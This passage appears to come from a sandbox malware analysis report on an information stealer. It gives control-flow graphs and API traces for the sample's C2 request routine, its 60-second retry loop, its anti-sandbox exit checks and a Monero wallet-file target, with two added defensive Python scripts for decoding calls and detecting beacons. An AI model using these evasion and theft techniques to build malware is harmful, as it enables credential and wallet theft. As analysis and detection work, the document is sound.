                          • Opcode ID: 05a552ea490c5d82e0f4ff537123782e813de8a809e9f9d011df9cff5dd133b7
                          • Instruction ID: 14c85a42115091d7d2d318f67ef6c37cd0313e821f97b4e88a569e4035e704a9
                          • Opcode Fuzzy Hash: 05a552ea490c5d82e0f4ff537123782e813de8a809e9f9d011df9cff5dd133b7
                          • Instruction Fuzzy Hash: AF622CB7500A10AFC397DFA8ED889663BFDF78E701F14851AA609C3264D73A9841DF52

                          Control-flow Graph (basic blocks: address range, calls, successor blocks)

                          • 1033 [166280-16630b] call 17a7a0, call 1647b0, call 17a740, InternetOpenA, StrCmpCA -> 1040, 1041
                          • 1040 [166314-166318] -> 1042, 1043
                          • 1041 [16630d] -> 1040
                          • 1042 [16631e-166342] InternetConnectA -> 1044, 1045
                          • 1043 [166509-166525] call 17a7a0, call 17a800 * 2 -> 1061
                          • 1044 [1664ff-166503] InternetCloseHandle -> 1043
                          • 1045 [166348-16634c] -> 1047, 1048
                          • 1047 [16634e-166358] -> 1050
                          • 1048 [16635a] -> 1050
                          • 1050 [166364-166392] HttpOpenRequestA -> 1053, 1054
                          • 1053 [1664f5-1664f9] InternetCloseHandle -> 1044
                          • 1054 [166398-16639c] -> 1056, 1057
                          • 1056 [1663c5-166405] HttpSendRequestA, HttpQueryInfoA -> 1059, 1060
                          • 1057 [16639e-1663bf] InternetSetOptionA -> 1056
                          • 1059 [166407-166427] call 17a740, call 17a800 * 2 -> 1061
                          • 1060 [16642c-16644b] call 178940 -> 1066, 1067
                          • 1061 [166528-16652d] (no successors)
                          • 1066 [16644d-166454] -> 1071, 1072
                          • 1067 [1664c9-1664e9] call 17a740, call 17a800 * 2 -> 1061
                          • 1071 [166456-166480] InternetReadFile -> 1076, 1077
                          • 1072 [1664c7-1664ef] InternetCloseHandle -> 1053
                          • 1076 [166482-166489] -> 1077, 1080
                          • 1077 [16648b] -> 1072
                          • 1080 [16648d-1664c5] call 17a9b0, call 17a8a0, call 17a800 -> 1071
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001663D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001663FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0016646D
                          • InternetCloseHandle.WININET(00000000), ref: 001664EF
                          • InternetCloseHandle.WININET(00000000), ref: 001664F9
                          • InternetCloseHandle.WININET(00000000), ref: 00166503
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 7c4df78e74bd8cd61c839a6354fcb258892633241165863b8517c9719a7a17d0
                          • Instruction ID: 048512d769259c9f3c3f76561c126f34d4fd8cce07da502b4eaf48f5a647b279
                          • Opcode Fuzzy Hash: 7c4df78e74bd8cd61c839a6354fcb258892633241165863b8517c9719a7a17d0
                          • Instruction Fuzzy Hash: 64714D71A00218ABDB24EFA0DC59FEE77B8FF44701F508198F50A6B190DBB56A85CF52
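The two records above (the dynamic-import resolver at 00179D9A-0017A6FD and the HTTP GET routine at 001662E1-00166503) are easier to read once the raw arguments are decoded. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's API lines, decodes the WinINet constants the report prints as hex (dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT, nService 3 = INTERNET_SERVICE_HTTP, dwFlags 00400100 = INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, dwOption 1F = INTERNET_OPTION_SECURITY_FLAGS, dwInfoLevel 13 = HTTP_QUERY_STATUS_CODE, the 7CF-byte read buffer, the EA60 ms sleep), and separates GetProcAddress calls whose name argument is a heap pointer (a string built at runtime) from the two names passed in plain text. The input lines are copied from this report; the constant table is standard wininet.h, and the line regex is the only assumption made about the report format.

```python
import re
from collections import Counter, defaultdict

# Constructed input: API lines copied from this report's function records,
# bullets and "Part of subcall function" wrappers included, as Joe Sandbox prints them.
SAMPLE_LINES = """
• GetProcAddress.KERNEL32(76210000,00CCDD00), ref: 00179D9A
• GetProcAddress.KERNEL32(76210000,00CCDB08), ref: 00179DB2
• LoadLibraryA.KERNEL32(00CCDB50,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A03D
• GetProcAddress.KERNEL32(6F4E0000,00CB6800), ref: 0017A5DA
• GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0017A5F1
• GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0017A607
  • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
• InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
• HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001663FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0016646D
• Sleep.KERNEL32(0000EA60), ref: 00175A1B
• ExitProcess.KERNEL32 ref: 001717D1
"""

# One report line: optional "Part of subcall function X:" prefix, Api.MODULE,
# an optional argument list, then the call-site address after "ref:" (assumed format).
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # a resolved 32-bit value or pointer

# Standard wininet.h values for HttpOpenRequestA dwFlags.
HTTP_OPEN_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

def decode_flags(value, table):
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)          # bits we have no name for
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"

# (API name, zero-based argument index) -> decoder for that argument.
DECODERS = {
    ("InternetOpenA", 1): lambda v: {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}.get(v, hex(v)),
    ("InternetConnectA", 5): lambda v: {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}.get(v, hex(v)),
    ("HttpOpenRequestA", 6): lambda v: decode_flags(v, HTTP_OPEN_FLAGS),
    ("InternetSetOptionA", 1): lambda v: {31: "INTERNET_OPTION_SECURITY_FLAGS"}.get(v, hex(v)),
    ("HttpQueryInfoA", 1): lambda v: {19: "HTTP_QUERY_STATUS_CODE"}.get(v, hex(v)),
    ("InternetReadFile", 2): lambda v: f"{v} bytes",
    ("Sleep", 0): lambda v: f"{v} ms ({v / 1000:g} s)",
}

def parse_line(line):
    m = LINE_RE.search(line)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": m.group("ref").upper(), "subcall": m.group("sub")}

def decode_call(call):
    """Map argument index -> symbolic meaning for the arguments we have a table for."""
    out = {}
    for i, arg in enumerate(call["args"]):
        decoder = DECODERS.get((call["api"], i))
        if decoder and HEX8.match(arg):
            out[i] = decoder(int(arg, 16))
    return out

def import_resolution_summary(calls):
    """For GetProcAddress, an 8-hex-digit name argument is a pointer to a string
    built at runtime; a literal name was present in plain text."""
    per_module = defaultdict(Counter)
    plaintext = []
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        base, name = c["args"][0], c["args"][1]
        if HEX8.match(name):
            per_module[base]["pointer"] += 1
        else:
            per_module[base]["literal"] += 1
            plaintext.append((base, name))
    return per_module, plaintext

def analyze(report_text):
    calls = [c for c in map(parse_line, report_text.splitlines()) if c]
    decoded = {(c["api"], c["ref"]): decode_call(c) for c in calls}
    per_module, plaintext = import_resolution_summary(calls)
    return {"calls": calls, "decoded": decoded, "per_module": per_module, "plaintext": plaintext}

if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for c in result["calls"]:
        meaning = result["decoded"][(c["api"], c["ref"])]
        if meaning:
            print(c["ref"], c["api"], ", ".join(f"arg{i}={v}" for i, v in meaning.items()))
    for base, counts in result["per_module"].items():
        print(base, dict(counts))
```

Run over a full report export this gives one row per call; the per-module counters show which module base carries the runtime-built names, and the plaintext list isolates the exceptions (here both from base 6F4E0000, which the lookups for InternetSetOptionA and HttpQueryInfoA suggest is wininet.dll). Note that the report does not show the value written by InternetSetOptionA, so the script names the option but does not guess the SECURITY_FLAG bits.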

                          Control-flow Graph (basic blocks: address range, calls, successor blocks)

                          • 1090 [175510-175577] call 175ad0, call 17a820 * 3, call 17a740 * 4 -> 1106
                          • 1106 [17557c-175583] (loop head) -> 1107, 1108
                          • 1107 [1755d7-17564c] call 17a740 * 2, call 161590, call 1752c0, call 17a8a0, call 17a800, call 17aad0, StrCmpCA -> 1134, 1138
                          • 1108 [175585-1755b6] call 17a820, call 17a7a0, call 161590, call 1751f0 -> 1124
                          • 1124 [1755bb-1755d2] call 17a8a0, call 17a800 -> 1134
                          • 1134 [175693-1756a9] call 17aad0, StrCmpCA -> 1139, 1140
                          • 1138 [17564e-17568e] call 17a7a0, call 161590, call 1751f0, call 17a8a0, call 17a800 -> 1134
                          • 1139 [1756af-1756b6] -> 1143, 1144
                          • 1140 [1757dc-175844] call 17a8a0, call 17a820 * 2, call 161670, call 17a800 * 4, call 176560, call 161550 -> 1270
                          • 1143 [1756bc-1756c3] -> 1147, 1148
                          • 1144 [1757da-17585f] call 17aad0, StrCmpCA -> 1162, 1163
                          • 1147 [1756c5-175719] call 17a820, call 17a7a0, call 161590, call 1751f0, call 17a8a0, call 17a800 -> 1144
                          • 1148 [17571e-175793] call 17a740 * 2, call 161590, call 1752c0, call 17a8a0, call 17a800, call 17aad0, StrCmpCA -> 1144, 1249
                          • 1162 [175865-17586c] -> 1170, 1171
                          • 1163 [175991-1759f9] call 17a8a0, call 17a820 * 2, call 161670, call 17a800 * 4, call 176560, call 161550 -> 1270
                          • 1170 [175872-175879] -> 1178, 1179
                          • 1171 [17598f-175a14] call 17aad0, StrCmpCA -> 1199, 1200
                          • 1178 [1758d3-175948] call 17a740 * 2, call 161590, call 1752c0, call 17a8a0, call 17a800, call 17aad0, StrCmpCA -> 1171, 1275
                          • 1179 [17587b-1758ce] call 17a820, call 17a7a0, call 161590, call 1751f0, call 17a8a0, call 17a800 -> 1171
                          • 1199 [175a16-175a21] Sleep -> 1106
                          • 1200 [175a28-175a91] call 17a8a0, call 17a820 * 2, call 161670, call 17a800 * 4, call 176560, call 161550 -> 1270
                          • 1249 [175795-1757d5] call 17a7a0, call 161590, call 1751f0, call 17a8a0, call 17a800 -> 1144
                          • 1270 [175ac3-175ac6] (no successors)
                          • 1275 [17594a-17598a] call 17a7a0, call 161590, call 1751f0, call 17a8a0, call 17a800 -> 1171
                          APIs
                            • Part of subcall function 0017A820: lstrlen.KERNEL32(00164F05,?,?,00164F05,00180DDE), ref: 0017A82B
                            • Part of subcall function 0017A820: lstrcpy.KERNEL32(00180DDE,00000000), ref: 0017A885
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001756A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175857
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175228
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 001752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175318
                            • Part of subcall function 001752C0: lstrlen.KERNEL32(00000000), ref: 0017532F
                            • Part of subcall function 001752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00175364
                            • Part of subcall function 001752C0: lstrlen.KERNEL32(00000000), ref: 00175383
                            • Part of subcall function 001752C0: lstrlen.KERNEL32(00000000), ref: 001753AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0017578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00175940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00175A1B
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: a24353f329dfa94c8a70d02de519ff97d97518ef757989ff38eef055517433e8
                          • Instruction ID: b926323940339baa0337ceb54897c394d3f5d07e0a2f75a5725a88a30a952074
                          • Opcode Fuzzy Hash: a24353f329dfa94c8a70d02de519ff97d97518ef757989ff38eef055517433e8
                          • Instruction Fuzzy Hash: 9BE14272910508ABCB19FBB0DC56AEE737DAFA5301F90C528B41A57091EF746B09CB93
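The record above is the task loop: every comparison in it is StrCmpCA against "ERROR", and when the last one (ref 00175A0C) matches, block 1199 calls Sleep(0000EA60), i.e. 60000 ms, and jumps back to the loop head at 17557c. A host whose C2 keeps answering "ERROR" therefore retries once a minute, with the other paths returning without sleeping. The script below is an added example and is not from the report or the sample: it runs a plain periodicity check over a constructed proxy log (hosts, addresses and paths are invented), flags source/destination pairs whose inter-request gaps cluster tightly around one value, and compares that value with the 60 s retry interval observed here. The 10 % tolerance, the 80 % regularity share and the minimum of four requests are tuning assumptions, not values from the report.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed proxy log (invented hosts, addresses and paths; not from the
# report). 10.0.0.5 retries one destination every ~60 s, 10.0.0.9 browses
# irregularly, and a third pair has too few requests to judge.
SAMPLE_LOG = """\
2024-10-07T10:00:00Z 10.0.0.5 198.51.100.7 POST /gate 200
2024-10-07T10:00:03Z 10.0.0.9 192.0.2.20 GET /index.html 200
2024-10-07T10:00:10Z 10.0.0.9 192.0.2.20 GET /style.css 200
2024-10-07T10:00:12Z 10.0.0.9 192.0.2.20 GET /app.js 200
2024-10-07T10:00:48Z 10.0.0.9 192.0.2.20 GET /news 200
2024-10-07T10:01:00Z 10.0.0.5 198.51.100.7 POST /gate 200
2024-10-07T10:01:30Z 10.0.0.5 192.0.2.30 GET /update.txt 404
2024-10-07T10:02:01Z 10.0.0.5 198.51.100.7 POST /gate 200
2024-10-07T10:02:03Z 10.0.0.9 192.0.2.20 GET /news/2 200
2024-10-07T10:02:06Z 10.0.0.9 192.0.2.20 GET /img/a.png 200
2024-10-07T10:03:00Z 10.0.0.5 198.51.100.7 POST /gate 200
2024-10-07T10:04:00Z 10.0.0.5 198.51.100.7 POST /gate 200
2024-10-07T10:04:15Z 10.0.0.5 192.0.2.30 GET /update.txt 404
2024-10-07T10:05:01Z 10.0.0.5 198.51.100.7 POST /gate 200
"""

STEALC_RETRY_S = 60.0  # Sleep(0xEA60) = 60000 ms at ref 00175A1B in the loop above

def parse_log(text):
    """Whitespace-separated 'timestamp src dst method path status' lines (assumed format)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _method, path, status = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, path, int(status)))
    return events

def find_beacons(events, min_hits=4, tolerance=0.10, min_regular=0.8):
    """Flag (src, dst) pairs whose request gaps sit within `tolerance` of their
    median for at least `min_regular` of the gaps. Median, not mean, so one
    missed cycle or one extra download does not hide the rhythm."""
    by_pair = defaultdict(list)
    for ts, src, dst, _path, _status in events:
        by_pair[(src, dst)].append(ts)
    findings = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        typical = median(gaps)
        if typical <= 0:
            continue
        regular = sum(1 for g in gaps if abs(g - typical) <= tolerance * typical)
        share = regular / len(gaps)
        if share >= min_regular:
            findings.append({"src": src, "dst": dst, "requests": len(stamps),
                             "median_gap_s": typical, "regular_share": share})
    return findings

def matches_interval(finding, expected_s=STEALC_RETRY_S, tolerance=0.10):
    """True when the detected period is the retry interval seen in this sample."""
    return abs(finding["median_gap_s"] - expected_s) <= tolerance * expected_s

if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
        tag = " (matches the 60 s retry interval)" if matches_interval(f) else ""
        print(f"{f['src']} -> {f['dst']}: {f['requests']} requests, median gap {f['median_gap_s']:.0f} s{tag}")
```

The period check is generic; the only thing tying it to this sample is STEALC_RETRY_S. Because the sample sleeps only on an "ERROR" response, a host that is being served tasks normally will not show this rhythm, so treat a match as a lead to pivot on (destination, HWID in the request, response bodies), not as the sole detection.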

                          Control-flow Graph (basic blocks: address range, calls, successor blocks)

                          • 1301 [1717a0-1717cd] call 17aad0, StrCmpCA -> 1304, 1305
                          • 1304 [1717d7-1717f1] call 17aad0 -> 1309
                          • 1305 [1717cf-1717d1] ExitProcess
                          • 1309 [1717f4-1717f8] -> 1310, 1311
                          • 1310 [1719c2-1719cd] call 17a800 (no successors)
                          • 1311 [1717fe-171811] -> 1312, 1313
                          • 1312 [171817-17181a] (13-way dispatch) -> 1316, 1317, 1318, 1319, 1320, 1321, 1322, 1323, 1324, 1325, 1326, 1327, 1328
                          • 1313 [17199e-1719bd] -> 1309
                          • 1316 [171835-171844] call 17a820 -> 1313
                          • 1317 [171913-171924] StrCmpCA -> 1350, 1351
                          • 1318 [171932-171943] StrCmpCA -> 1329, 1330
                          • 1319 [1718f1-171902] StrCmpCA -> 1348, 1349
                          • 1320 [171951-171962] StrCmpCA -> 1331, 1332
                          • 1321 [171970-171981] StrCmpCA -> 1334, 1335
                          • 1322 [17187f-171890] StrCmpCA -> 1342, 1343
                          • 1323 [17185d-17186e] StrCmpCA -> 1340, 1341
                          • 1324 [171821-171830] call 17a820 -> 1313
                          • 1325 [1718cf-1718e0] StrCmpCA -> 1346, 1347
                          • 1326 [17198f-171999] call 17a820 -> 1313
                          • 1327 [1718ad-1718be] StrCmpCA -> 1344, 1345
                          • 1328 [171849-171858] call 17a820 -> 1313
                          • 1329 [171945-171948] -> 1330
                          • 1330 [17194f] -> 1313
                          • 1331 [171964-171967] -> 1332
                          • 1332 [17196e] -> 1313
                          • 1334 [171983-171986] -> 1335
                          • 1335 [17198d] -> 1313
                          • 1340 [171870-171873] -> 1341
                          • 1341 [17187a] -> 1313
                          • 1342 [171892-17189c] -> 1355
                          • 1343 [17189e-1718a1] -> 1355
                          • 1344 [1718c0-1718c3] -> 1345
                          • 1345 [1718ca] -> 1313
                          • 1346 [1718e2-1718e5] -> 1347
                          • 1347 [1718ec] -> 1313
                          • 1348 [171904-171907] -> 1349
                          • 1349 [17190e] -> 1313
                          • 1350 [171926-171929] -> 1351
                          • 1351 [171930] -> 1313
                          • 1355 [1718a8] -> 1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 001717C5
                          • ExitProcess.KERNEL32 ref: 001717D1
                          Strings
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: fb264f17b35e7d126fd262c2e210cc5655307524dafcf55c559178be26d62641
                          • Instruction ID: 962dd092440af0df72329af0dbc5fb9d41f97488502670607f136c0e965e75ae
                          • Opcode Fuzzy Hash: fb264f17b35e7d126fd262c2e210cc5655307524dafcf55c559178be26d62641
                          • Instruction Fuzzy Hash: B3514FB5A08209FFCB05DFE4D954ABE77B9BF84704F10C048E90AA7240D775EA56CB62

                          Control-flow Graph (basic blocks: address range, calls, successor blocks)

                          • 1356 [177500-17754a] GetWindowsDirectoryA -> 1357, 1358
                          • 1357 [177553-1775c7] GetVolumeInformationA, call 178d00 * 3 -> 1365
                          • 1358 [17754c] -> 1357
                          • 1365 [1775d8-1775df] -> 1366, 1367
                          • 1366 [1775e1-1775fa] call 178d00 -> 1365
                          • 1367 [1775fc-177617] GetProcessHeap, RtlAllocateHeap -> 1369, 1370
                          • 1369 [177619-177626] call 17a740 -> 1377
                          • 1370 [177628-177658] wsprintfA, call 17a740 -> 1377
                          • 1377 [17767e-17768e] (no successors)
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00177542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0017760A
                          • wsprintfA.USER32 ref: 00177640
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 58ec54d93e30cd6047dcdf6c9e1195a6d661935bae6a9863dcbbac509b9c071b
                          • Instruction ID: 880ed3d53accdbfffdbfa5f4ea5996ca86636ea2f83495e2788498f1f93cc92a
                          • Opcode Fuzzy Hash: 58ec54d93e30cd6047dcdf6c9e1195a6d661935bae6a9863dcbbac509b9c071b
                          • Instruction Fuzzy Hash: 3F41B3B1D04248ABDB11DF94DC45BEEBBB8EF18700F104198F509A7280D7796A44CFA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1738), ref: 001798A1
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1528), ref: 001798BA
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC15A0), ref: 001798D2
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC15D0), ref: 001798EA
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1540), ref: 00179903
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC9478), ref: 0017991B
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CB64A0), ref: 00179933
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CB62E0), ref: 0017994C
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1648), ref: 00179964
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1588), ref: 0017997C
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1600), ref: 00179995
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC1750), ref: 001799AD
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CB6320), ref: 001799C5
                            • Part of subcall function 00179860: GetProcAddress.KERNEL32(76210000,00CC17B0), ref: 001799DE
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 001611D0: ExitProcess.KERNEL32 ref: 00161211
                            • Part of subcall function 00161160: GetSystemInfo.KERNEL32(?), ref: 0016116A
                            • Part of subcall function 00161160: ExitProcess.KERNEL32 ref: 0016117E
                            • Part of subcall function 00161110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0016112B
                            • Part of subcall function 00161110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00161132
                            • Part of subcall function 00161110: ExitProcess.KERNEL32 ref: 00161143
                            • Part of subcall function 00161220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0016123E
                            • Part of subcall function 00161220: __aulldiv.LIBCMT ref: 00161258
                            • Part of subcall function 00161220: __aulldiv.LIBCMT ref: 00161266
                            • Part of subcall function 00161220: ExitProcess.KERNEL32 ref: 00161294
                            • Part of subcall function 00176770: GetUserDefaultLangID.KERNEL32 ref: 00176774
                            • Part of subcall function 00161190: ExitProcess.KERNEL32 ref: 001611C6
                            • Part of subcall function 00177850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001611B7), ref: 00177880
                            • Part of subcall function 00177850: RtlAllocateHeap.NTDLL(00000000), ref: 00177887
                            • Part of subcall function 00177850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0017789F
                            • Part of subcall function 001778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177910
                            • Part of subcall function 001778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00177917
                            • Part of subcall function 001778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0017792F
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00176AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00176AF9
                          • Sleep.KERNEL32(00001770), ref: 00176B04
                          • CloseHandle.KERNEL32(?,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176B1A
                          • ExitProcess.KERNEL32 ref: 00176B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0

                          Control-flow Graph

                          (graph image not preserved; basic blocks and edges recovered from the graph data)
                          • 161220-161247: call 1789b0, GlobalMemoryStatusEx -> 161273-16127a or 161249-161271
                          • 161249-161271: call 17da00 (x2) -> 161281-161285
                          • 161273-16127a -> 161281-161285
                          • 161281-161285 -> 161287 or 16129a-16129d
                          • 161287 -> 161292-161294 (ExitProcess) or 161289-161290
                          • 161289-161290 -> 16129a-16129d or 161292-161294 (ExitProcess)
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0016123E
                          • __aulldiv.LIBCMT ref: 00161258
                          • __aulldiv.LIBCMT ref: 00161266
                          • ExitProcess.KERNEL32 ref: 00161294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989

                          Control-flow Graph

                          (graph image not preserved; basic blocks and edges recovered from the graph data)
                          • 176af3 -> 176b0a
                          • 176b0a -> 176b0c-176b22 or 176aba-176ad7
                          • 176aba-176ad7: call 17aad0, OpenEventA -> 176af5-176b04 or 176ad9-176af1
                          • 176af5-176b04: CloseHandle, Sleep -> 176b0a
                          • 176ad9-176af1: call 17aad0, CreateEventA -> 176b0c-176b22
                          • 176b0c-176b22: call 176920, call 175b10, CloseHandle, ExitProcess
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00176AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00176AF9
                          • Sleep.KERNEL32(00001770), ref: 00176B04
